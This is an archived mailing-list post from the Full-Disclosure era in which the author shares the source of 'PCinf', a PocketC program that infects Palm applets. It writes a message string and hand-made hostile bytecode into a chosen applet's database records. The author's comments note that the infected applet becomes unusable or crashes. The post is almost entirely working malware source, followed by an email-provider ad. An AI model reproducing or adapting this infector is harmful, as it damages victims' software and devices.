lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: qobaiashi at gmx.net (qobaiashi@....net) Subject: // playing pocketc woops there was a typo in the code.. take this one: // PCinf.c /* this is a simple code infector for pocketc running on palm compatible hardware. it injects a string printing code. you can also use the launch() code and exec eg. "memo".. unpleasant side effects: *atm the applet gets "unusable" for its normal purpose :> *bigger applets crash due to this buggy "ret" thingie.. by qobaiashi */ #define LOCATION 0x1d main() { string name, code[11] = {"\x03\x90\x05\x07\x28\x01 \x2c\x2b\x2f\x29\x00"}; msg[12] = // 1st byte = strlen! {"\x0ainfected!\n\x00"}; int dbcntr = 0, cntr, record, size, r2size; char patch; pointer ptr; clear(); puts(" ---PCinf--- \n"); puts(" PocketC \n"); puts(" infector \n"); puts(" by qobaiashi\n\n"); name = gets("Applet to infect:"); if (strlen(name) == 0) { puts("[!] i need a victim..\n"); launch("PktC"); } puts("[*] using applet: "+name+ "\n"); // opening said database dbopen(name); //---string infector section---\\ //write a string into #2 // set record number: record = 2; dbrec(record); dbcntr = dbsize(); r2size = dbcntr;// for patching.. puts("using record "+record+"\n"); puts("record size = "+dbcntr+"\n"; // set offset in current record dbseek(dbcntr); puts("location is "+dbpos()+"\n\n"); size = strlen(msg); ptr = msg+size; dbwritex(ptr, 'c'); ptr = msg; dbwritex(ptr, 'ssize'); //---code infector section---\\ // set record number record = 0; dbcntr = dbsize(); puts("using record "+record+"\n"); puts("record size = "+dbcntr"\n"); // set offset in current record dbseek(LOCATION); puts("location is "+dbpos()+"\n\n"); // write out hostile code ptr = code; dbwritex(ptr, 'ssize'); // patch 0x00 into code ptr = code + size; dbseek(LOCATION+1); dbwritex(ptr, 'c'); // patch string offset in #2 into code dbseek(LOCATION+2); patch = r2size; dbwritex(&patch, 'c'); dbclose(); puts(" infection done!\n"); } -- COMPUTERBILD 15/03: Premium-e-mail-Dienste im Test -------------------------------------------------- 1. GMX TopMail - Platz 1 und Testsieger! 2. GMX ProMail - Platz 2 und Preis-Qualit?tssieger! 3. Arcor - 4. web.de - 5. T-Online - 6. freenet.de - 7. daybyday - 8. e-Post
Powered by blists - more mailing lists